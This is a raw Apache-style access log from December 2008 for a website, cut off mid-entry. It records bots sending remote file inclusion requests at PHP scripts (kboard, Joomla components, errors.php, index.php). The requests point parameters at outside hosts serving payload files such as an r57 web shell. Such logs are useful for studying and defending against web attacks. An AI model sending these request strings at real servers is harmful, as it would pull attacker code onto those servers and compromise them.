64.124.222.166 - - [03/Dec/2008:09:32:47 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "serevents.com"
64.124.222.166 - - [03/Dec/2008:09:32:48 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "serevents.com"
195.225.170.148 - - [03/Dec/2008:09:32:54 -0800] "GET /logs/?_REQUEST=&_REQUEST[option]=com_chronocontact&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 200 938 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "serevents.com"
195.225.170.148 - - [03/Dec/2008:09:32:54 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_chronocontact&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "serevents.com"
211.43.212.56 - - [03/Dec/2008:09:33:22 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 200 943 "-" "libwww-perl/5.79" "serevents.com"
211.43.212.56 - - [03/Dec/2008:09:33:22 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.43.212.56 - - [03/Dec/2008:09:33:22 -0800] "GET /?path%5Bdocroot%5D=http://www.seanbatt.com/gallery/ee_commerce/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "serevents.com"
212.193.224.213 - - [03/Dec/2008:09:33:48 -0800] "GET /index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
61.197.228.84 - - [03/Dec/2008:09:33:56 -0800] "GET /logs/errors.php?error=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:09:33:56 -0800] "GET /errors.php?error=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:09:33:56 -0800] "GET /logs/access.log/errors.php?error=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:09:34:27 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.serevents.com"
195.225.170.148 - - [03/Dec/2008:09:34:27 -0800] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anonimo234.interfree.it/fuck.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:09:34:51 -0800] "GET /errors.php?error=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:09:34:51 -0800] "GET /logs/errors.php?error=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:09:34:51 -0800] "GET /logs/access.log/errors.php?error=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
212.193.224.213 - - [03/Dec/2008:09:35:29 -0800] "GET /logs/access.log/index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
212.193.224.213 - - [03/Dec/2008:09:35:29 -0800] "GET /index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
212.193.224.213 - - [03/Dec/2008:09:35:29 -0800] "GET /logs/index.php?redir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
77.221.130.16 - - [03/Dec/2008:09:36:07 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bjork.4mg.com/bjorkid.t